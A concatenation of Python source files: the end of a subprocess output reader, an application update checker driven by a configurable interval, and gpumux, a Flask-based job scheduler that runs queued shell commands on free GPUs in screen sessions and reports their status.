stdErrMessage = outputFile.readline().rstrip() try: if not self.isShuttingDown: onDataCallback(stdErrMessage) except: logging.error("%s threw exception: %s", onDataCallback.__name__, traceback.format_exc()) finally: logging.debug("SubprocessRunner closing %s to subprocess", description) outputFile.close()
Update.py
#!/usr/bin/env python # -*- coding: utf-8 -*- import threading import time from Da import AppBase from Da import Config from Da import Updater from View import UpdateInfoView class Update : def __init__ (self) : self.app = AppBase.info self.Updater = Updater.Updater() self.Cfg = Config.Config() self.UdView = UpdateInfoView.GUI() def chkUpdate (self, force = False) : cfgInfo = self.Cfg.get() now = int(time.time()) if force == False : if cfgInfo['udrate'] == 1: updateTime = int(cfgInfo['udtime']) + 86400 elif cfgInfo['udrate'] == 2: updateTime = int(cfgInfo['udtime']) + 86400 * 7 elif cfgInfo['udrate'] == 3: updateTime = int(cfgInfo['udtime']) + 86400 * 30 else : updateTime = int(cfgInfo['udtime']) + 86400 * 7 else : updateTime = 0 if updateTime < now : self.UdView.show() threading.Thread(target = self.__check).start() self.UdView.updateInfo() def __check (self) : now = int(time.time()) info = self.Updater.check(self.app['build']) self.Cfg.save({'udtime': now}) self.UdView.udInfo = info
gpumux.py
#!/usr/bin/env python3 # Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import argparse import collections import glob import os import re import shutil import socket import subprocess import threading import time import flask R_GPU = re.compile('GPU\s+(?P<id>\d+):\s+(?P<model>.+)') parser = argparse.ArgumentParser() parser.add_argument('-p', '--port', help='Port to use for this service.', type=int, default=3390) parser.add_argument('--gpus', help='List of GPUs to use (inclusive).', type=str, default='0-255') parser.add_argument('--logdir', help='Directory to store logs.', type=str, default='gpumux') parser.add_argument('--path', help='Folder where to run jobs..', type=str, default='.') parser.add_argument('--py', help='Path to custom python interpreter.', type=str, default='') args = parser.parse_args() PATH = os.path.abspath(args.path) PENDING_JOBS = os.path.join(PATH, args.logdir, 'pending_jobs.txt') RUNNING_PATH = os.path.join(PATH, args.logdir, 'running') COMPLETED_PATH = os.path.join(PATH, args.logdir, 'completed') SCREEN_RC = 'logfile %d.log\n' BASH_CMD = """#!/bin/bash pushd """ + PATH + """ CUDA_VISIBLE_DEVICES=%(gpu)s PYTHONPATH=. """ + args.py + """ ./%(cmd)s status=$? popd echo $status > %(status)s """ def apply_gpu_preferences(detected): gmin, gmax = map(int, args.gpus.split('-')) to_del = [x for x in detected.keys() if x < gmin or x > gmax] while to_del: del detected[to_del.pop()] return detected def get_gpus(): cmd_outut = subprocess.check_output(['nvidia-smi', '--list-gpus']).decode() gpus = collections.OrderedDict() for x in cmd_outut.split('\n'): if not x: continue expr = R_GPU.match(x) gpus[int(expr.group('id'))] = expr.group('model') gpus = apply_gpu_preferences(gpus) print('GPUs available %d' % len(gpus)) for k, v in gpus.items(): print('%-2d %s' % (k, v)) return gpus class MyFlask(flask.Flask): jinja_options = flask.Flask.jinja_options.copy() jinja_options.update(dict(block_start_string='<%', block_end_string='%>', variable_start_string='${', variable_end_string='}', comment_start_string='<#', comment_end_string='#>', )) class Jobs: CAST = dict(gpu=int, status=int, cmd=str) def __init__(self): self.pending = [x for x in open(PENDING_JOBS, 'r').read().split('\n') if x] self.running = self.parse_jobs(RUNNING_PATH) self.completed = self.parse_jobs(COMPLETED_PATH) self.pending_update = [] def refresh(self): if self.pending_update: open(PENDING_JOBS, 'w').write(self.pending_update.pop()) while self.pending_update: self.pending_update.pop() self.pending = [x for x in open(PENDING_JOBS, 'r').read().split('\n') if x] self.running = self.parse_jobs(RUNNING_PATH) to_complete = [x for x in self.running if x.status is not None] if to_complete: self.running = [x for x in self.running if x not in to_complete] for x in to_complete: x.complete() self.completed = self.parse_jobs(COMPLETED_PATH) update_pending_file = False while self.schedule(): update_pending_file = True if update_pending_file: open(PENDING_JOBS, 'w').write('\n'.join(self.pending)) def schedule(self): if not self.pending: return False gpu_used = set([x.gpu for x in self.running]) gpu_all = set(GPUS.keys()) gpu_free = gpu_all - gpu_used if not gpu_free: return False gpu = list(gpu_free)[0] id = 0 if self.running or self.completed: id = max(x.id for x in self.running + self.completed) id += 1 cmd = self.pending.pop(0) j = Job(id, gpu, cmd, None) self.running.append(j) return True @classmethod def parse_jobs(cls, folder): logs = set( map(os.path.basename, glob.glob(os.path.join(folder, '*.*')))) ids = sorted(set(int(x.split('.')[0]) for x in logs)) jobs = [] for x in ids: params = {} for key, cast in cls.CAST.items(): params[key] = None if str(x) + '.' + key in logs: params[key] = cast( open(os.path.join(folder, str(x) + '.' + key), 'r').read()) jobs.append(Job(x, **params)) return jobs class Job: def __init__(self, id, gpu, cmd, status): self.id = id self.gpu = gpu self.cmd = cmd self.status = status if gpu is not None and status is None and not self.is_running(): # Jobs that were interrupted by a reboot or some other action. self.spawn() self.running_time = self.compute_running_time() @property def screen_id(self): return 'gpumux_%d' % self.id @property def json(self): return dict(id=self.id, gpu=self.gpu, cmd=self.cmd, status=self.status, time=self.running_time) def is_running(self): if self.id is None: return False screens = subprocess.run(['screen', '-ls'], stdout=subprocess.PIPE) return self.screen_id in screens.stdout.decode() def compute_running_time(self): if not os.path.exists(os.path.join(RUNNING_PATH, '%d.gpu' % self.id)): path = COMPLETED_PATH else: path = RUNNING_PATH start_time = os.path.getmtime(os.path.join(path, '%d.gpu' % self.id)) if path == RUNNING_PATH: return round(time.time() - start_time) end_time = os.path.getmtime(os.path.join(path, '%d.status' % self.id)) return round(end_time - start_time) def spawn(self): assert self.status is None bash_cmd = BASH_CMD % dict(cmd=self.cmd, gpu=self.gpu, status='%d.status' % self.id) open(os.path.join(RUNNING_PATH, '%d.gpu' % self.id), 'w').write( str(self.gpu) + '\n') open(os.path.join(RUNNING_PATH, '%d.cmd' % self.id), 'w').write( str(self.cmd) + '\n') open(os.path.join(RUNNING_PATH, '%d.sh' % self.id), 'w').write(bash_cmd) open(os.path.join(RUNNING_PATH, '%d.screenrc' % self.id), 'w').write( SCREEN_RC % self.id) os.chmod(os.path.join(RUNNING_PATH, '%d.sh' % self.id), 0o700) popen = subprocess.Popen(['screen', '-dm', '-L', '-S', self.screen_id, '-c', '%d.screenrc' % self.id, './%d.sh' % self.id], cwd=RUNNING_PATH) status = popen.wait() assert status == 0 def complete(self): assert self.status is not None files = glob.glob(os.path.join(RUNNING_PATH, '%d.*' % self.id)) for x in files: shutil.move(x, os.path.join(COMPLETED_PATH, os.path.basename(x))) HOST = socket.gethostname() GPUS = get_gpus() app = MyFlask(__name__) @app.route('/') def home(): return flask.render_template('home.html', host=HOST, path=PATH, gpus=len(GPUS), python=args.py or 'default') @app.route('/status.json') def status(): return flask.jsonify(job_thread=JOB_THREAD.is_alive(), completed_jobs=[x.json for x in JOBS.completed][::-1], running_jobs=[x.json for x in JOBS.running], pending_jobs='\n'.join(JOBS.pending)) @app.route('/queue/update.json', methods=['POST']) def queue_update(): pending = flask.request.json['pending'] JOBS.pending_update.append(pending) return flask.jsonify(pending=pending) @app.route('/job/<job_id>') def job_log(job_id): if os.path.exists(os.path.join(RUNNING_PATH, '%s.log' % job_id)): fn = os.path.join(RUNNING_PATH, '%s.log' % job_id) elif os.path.exists(os.path.join(COMPLETED_PATH, '%s.log' % job_id)): fn = os.path.join(COMPLETED_PATH, '%s.log' % job_id) else: flask.abort(404) return flask.Response(open(fn, 'r').read(), mimetype='text/plain') def job_thread(): print('Starting jobs manager.') while True: JOBS.refresh() time.sleep(1) print(RUNNING_PATH) os.makedirs(RUNNING_PATH, exist_ok=True) os.makedirs(COMPLETED_PATH, exist_ok=True) if not os.path.exists(PENDING_JOBS): open(PENDING_JOBS, 'w').write('') JOBS = Jobs() JOB_THREAD = threading.Thread(target=job_thread) def main(): JOB_THREAD.start() app.run(port=args.port) if __name__ == '__main__': main()